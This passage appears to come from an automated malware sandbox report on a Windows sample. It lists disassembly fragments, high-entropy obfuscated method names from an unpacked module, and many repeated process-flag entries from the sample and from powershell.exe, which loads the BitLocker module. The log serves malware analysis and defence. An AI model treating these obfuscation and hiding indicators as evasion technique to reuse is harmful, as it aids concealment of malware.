                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0041E88A push esi; ret 3_2_0041E88B
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_00404956 push CD785CF3h; ret 3_2_00404960
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_004051F5 push ebx; retf 3_2_004051FA
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_004139A3 push esi; ret 3_2_004139AA
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_00405A87 push ecx; retf 3_2_00405A91
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0041ABDA push esi; ret 3_2_0041ABEA
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0041ABE3 push esi; ret 3_2_0041ABEA
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_00417C4D push 00000024h; ret 3_2_00417C4F
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_00418C73 push eax; ret 3_2_00418D0A
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_004034F0 push eax; ret 3_2_004034F2
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_00417570 push edx; retf 3_2_00417596
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_00418DD0 push es; iretd 3_2_00418DD1
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_004185A9 push A3C436E7h; ret 3_2_004185CB
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_00404EC1 push ecx; iretd 3_2_00404EC6
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0041074B push 3788F9D1h; ret 3_2_00410752
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0040D709 push esp; iretd 3_2_0040D70A
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0041971B push ebx; iretd 3_2_00419720
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_00417FCA push ebx; retf 3_2_00417FDD
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_004117D3 push edi; ret 3_2_004117DA
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0194225F pushad ; ret 3_2_019427F9
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019427FA pushad ; ret 3_2_019427F9
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019709AD push ecx; mov dword ptr [esp], ecx3_2_019709B6
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0194283D push eax; iretd 3_2_01942858
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01941368 push eax; iretd 3_2_01941369
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02C7225F pushad ; ret 6_2_02C727F9
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02C727FA pushad ; ret 6_2_02C727F9
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02C7283D push eax; iretd 6_2_02C72858
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02CA09AD push ecx; mov dword ptr [esp], ecx6_2_02CA09B6
                Source: mKv3sKQ5Q4E7waF.exeStatic PE information: section name: .text entropy: 7.767145676620625
                Source: 0.2.mKv3sKQ5Q4E7waF.exe.6dc0000.3.raw.unpack, SuTMkKTIGlGsWNHncQ.csHigh entropy of concatenated method names: 'rEKcn5tWs4', 'z0IcsRG0H7', 'AI7ck6HdsV', 'Vu3k5pyhR4', 'fwskz7tarn', 'iSncWkJJf2', 'RYMcPulPvb', 'thjcEabBuF', 'gjDcb2Lr3q', 'tOWcYrXH4x'
                Source: 0.2.mKv3sKQ5Q4E7waF.exe.6dc0000.3.raw.unpack, jYZmvtAx2Fnacyn2Tb.csHigh entropy of concatenated method names: 'dmabxLYwaV', 'AO7bnN4kQk', 'J1wbUhR2Li', 'dN9bsEGvAB', 'cL0binYuBL', 'NCKbkKl8FL', 'lklbcC6vPx', 'FjIbAKLOPl', 'W6eba8M3di', 'JIxbXbdCdI'
                Source: 0.2.mKv3sKQ5Q4E7waF.exe.6dc0000.3.raw.unpack, BhXLZqPPuTKGGDJRbFt.csHigh entropy of concatenated method names: 'CaG252lX4x', 'JtH2zV1GR0', 'RbeVWy9iPV', 'HZKVPYm88H', 'rQCVE0VJDp', 'cawVbFHCEB', 'JRjVYkacsO', 'K3cVx8w9En', 'yTgVnYQJU4', 'niSVUP1lic'
                Source: 0.2.mKv3sKQ5Q4E7waF.exe.6dc0000.3.raw.unpack, Kx1GDhgghTu9PW3w7v.csHigh entropy of concatenated method names: 'e9EsfnxueP', 'YAdsrtkNKB', 'gB9sNmgSJR', 'g6qsgV7dem', 'VNxs4CpfFP', 'U6VsDgEwuh', 'PsQsSIExWN', 'wvGspEee3o', 'DbRs0e0TZ7', 'QoKs2Uf89L'
                Source: 0.2.mKv3sKQ5Q4E7waF.exe.6dc0000.3.raw.unpack, rBYAUJz6wAWbg3jL6H.csHigh entropy of concatenated method names: 'Ka82rFbcpI', 'LBV2NqCThq', 'MFF2gBoDEi', 's3x2B7ICqu', 'N5P2ym8r0d', 'AHC2jxyRVF', 'YMo2Mcrid7', 'ta92veAdu9', 'uAN2HW8oWb', 'ocX21m5kN6'
                Source: 0.2.mKv3sKQ5Q4E7waF.exe.6dc0000.3.raw.unpack, lHrjOpPbaMjf6cHIFhk.csHigh entropy of concatenated method names: 'xd3V5ppwkH', 'KplVzWJKFm', 'Duu9Wq23Kd', 'jlektlVYwoTFPZ0xCka', 'Advwf7V93Oa73pfTbUS', 'yTc1t4VG2S4EPLZDiIC', 'eKc66uVDGBxixPrgcXp'
                Source: 0.2.mKv3sKQ5Q4E7waF.exe.6dc0000.3.raw.unpack, hXOZMgPWoy5t7VGMb6h.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'gg42qAEQNj', 'tLb27vj4lc', 'PK42hYxx1I', 'WFT2oBjAf6', 'KQO2LDIH7q', 'Lk4281Gb0v', 'HQg2tK9dyx'
                Source: 0.2.mKv3sKQ5Q4E7waF.exe.6dc0000.3.raw.unpack, rJbSCCF0kQvgnWoG9w.csHigh entropy of concatenated method names: 'cUkSJAphEO', 'y7YS5bqCEL', 'cwqpWaawIX', 'KpqpPwine1', 'ERVSqvHCAI', 'M4HS7atNen', 'EMtSh0NHBN', 'Le5SobcTy8', 'NHRSLXL4HV', 'nRgS8L7cuh'
                Source: 0.2.mKv3sKQ5Q4E7waF.exe.6dc0000.3.raw.unpack, wdbVOiEtP6Gd3v8DOQ.csHigh entropy of concatenated method names: 'PgkelgFe1', 'm2OfijXK6', 'PnHrVli8b', 'TfaK0OtXP', 'nxXgryfkG', 'ylrlhMUBZ', 'Jg7axLSpdU1OyOpNrA', 'PiyFxnKNSMnsUAWS64', 'vTa7V8TKQDC6ZBLPDd', 'UMppeSUUw'
                Source: 0.2.mKv3sKQ5Q4E7waF.exe.6dc0000.3.raw.unpack, fkLHt5CC90DtjuGoCT.csHigh entropy of concatenated method names: 'NbO0BfahAo', 'DXc0yFBvb3', 'TwO06PUI6e', 'pMr0jrIufY', 'Nac0M53HwW', 'iUm0RsAdfl', 'Cm50TVrUjU', 'pNU0ZCnpki', 'E9f0mXlcq4', 'pXI0Ih7oQ3'
                Source: 0.2.mKv3sKQ5Q4E7waF.exe.6dc0000.3.raw.unpack, crkeaN5sw8OIUM48cG.csHigh entropy of concatenated method names: 'pqS2srvX1L', 'GW92i3ymWU', 'R7S2kHi2Td', 'eNb2cIijEi', 'xmF20KQJVQ', 'KEH2AfRwLD', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.mKv3sKQ5Q4E7waF.exe.6dc0000.3.raw.unpack, z4PbskhVDCbKMwMKko.csHigh entropy of concatenated method names: 'qTuwNgGhfb', 'NjtwgEgReU', 'KjMwBL2Mpm', 'X0awySw1hy', 'IQtwjfZsvc', 'Y87wM4B892', 'H7WwTuYAqf', 'sZEwZj9SkP', 'JCuwItwe5P', 'DCywqyUDeh'
                Source: 0.2.mKv3sKQ5Q4E7waF.exe.6dc0000.3.raw.unpack, abXBRIlRPJp2EuvZGH.csHigh entropy of concatenated method names: 'qcYidYSP28', 'S7UiKA1dGE', 'Xats62PHjA', 'tWUsjnw8II', 'eTRsMCQryf', 's7vsRQUfkO', 'rEksTpW24S', 'cv7sZuo1cE', 'QiEsmBrwqs', 'D44sIGZmEu'
                Source: 0.2.mKv3sKQ5Q4E7waF.exe.6dc0000.3.raw.unpack, GsKwv0o9cmKpMIr94F.csHigh entropy of concatenated method names: 'JfV4I20pmJ', 'nGK47WN0Ba', 'LDr4oM9dcS', 'Huw4LmupMc', 'SDN4yAB7FW', 'frq46bQPet', 'JL94jWw5Dg', 'Jma4MoYlOw', 'EVI4Rd82w1', 'OFQ4THVNyN'
                Source: 0.2.mKv3sKQ5Q4E7waF.exe.6dc0000.3.raw.unpack, WE1V7aBLWMeVoWmRdf.csHigh entropy of concatenated method names: 'o1dkx2eopf', 'KZ9kU2eC07', 'CO2kion2PI', 'uGfkcAo8ML', 'qTXkARTkxi', 'wqNiupTjh9', 'A8NiFM6qmS', 'sE6iOFRW1p', 'tjRiJjaoxc', 'rwmiCVm9uI'
                Source: 0.2.mKv3sKQ5Q4E7waF.exe.6dc0000.3.raw.unpack, QMVdhYm5OHL2OPrmSg.csHigh entropy of concatenated method names: 'tWjcH7TR1d', 'ITZc1UyxN0', 'CfrceHRbyP', 'pq1cfmMpdH', 'IXccdpa7ak', 'SH6crXyCp0', 'rC0cKWJ8rn', 'blMcN54Iu2', 'vE9cgIarAo', 'XFVclABZiA'
                Source: 0.2.mKv3sKQ5Q4E7waF.exe.6dc0000.3.raw.unpack, xpnZcgsJiXC1IMvqhj.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'rH4ECovY6T', 'TcjE58WYyK', 'YK8EzKKN2o', 'UX4bWhrcjM', 'TuFbPucfmb', 'dFlbELCLWe', 'iURbb4FKOp', 'eYnUBIrfsS5Q9I0TcME'
                Source: 0.2.mKv3sKQ5Q4E7waF.exe.6dc0000.3.raw.unpack, rV7q4fYZRC0xmMKdHc.csHigh entropy of concatenated method names: 'KxlPcolyCt', 'Q8kPALdxjD', 'PghPXTu9PW', 'ww7PGvWbXB', 'UvZP4GHJE1', 't7aPDLWMeV', 'G6VmeroGZ1mFMZ0n8o', 'usgN7XJN2aIkDvCnU2', 'X0TPP9OMfC', 'XVSPb2gEKb'
                Source: 0.2.mKv3sKQ5Q4E7waF.exe.6dc0000.3.raw.unpack, FFWgXPUnjnYIHCLMC2.csHigh entropy of concatenated method names: 'Dispose', 'cL7PCk5I0h', 'uR9EyuWF83', 'dKEaee4hvH', 'YltP5mTo1U', 'dsBPzAMxNn', 'ProcessDialogKey', 'CvnEWkLHt5', 'X90EPDtjuG', 'QCTEEbrkea'
                Source: 0.2.mKv3sKQ5Q4E7waF.exe.6dc0000.3.raw.unpack, pP3vR38Ho4i1OMCl5n.csHigh entropy of concatenated method names: 'ToString', 'DN4Dq2Apb6', 'CfGDyblZFL', 'OGHD6bWNqS', 'tjdDjPhpDt', 'q2wDMiXMsV', 'amODRQ2RgW', 'i08DTJd70A', 'lUkDZf6ec6', 'vlTDmaW75m'
                Source: 0.2.mKv3sKQ5Q4E7waF.exe.6dc0000.3.raw.unpack, U9UOu2OmqbL7k5I0h5.csHigh entropy of concatenated method names: 'EPp04APBDe', 'OTJ0SmBKAx', 'Pkx00jGJ97', 'VRx0VJyQKJ', 'e3W0QTaGka', 'ECn0v059Mr', 'Dispose', 'VcEpno8u62', 'M1tpUx3mx1', 'oJ7psy4kBE'
                Source: 0.2.mKv3sKQ5Q4E7waF.exe.6dc0000.3.raw.unpack, kv4clKyFl8wmhmdgTR.csHigh entropy of concatenated method names: 'ytId2TeKsBx3h5JMgiY', 'sDLsTqeTwocytNhPGHq', 'tjEkpBZdeK', 'k1Xk0c7huA', 'h3Xk2exjKB', 'eSAmSueFMYOUlxwDgtN', 'fhWnMYenCbDaFAQZfR0'
                Source: 0.2.mKv3sKQ5Q4E7waF.exe.6dc0000.3.raw.unpack, FolyCtNo8kLdxjDknn.csHigh entropy of concatenated method names: 'zp1UoERehN', 'RRpULr8kGc', 'vtTU8DeYTg', 'lm9UtrjwCa', 'Bv2UumBRfc', 'siVUFtS7uq', 'L2DUOadG2U', 'xq6UJgp07m', 'FCWUCFQj5H', 'urVU5P1R6M'

                Hooking and other Techniques for Hiding and Protection

                barindex
                Loading BitLocker PowerShell Module
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
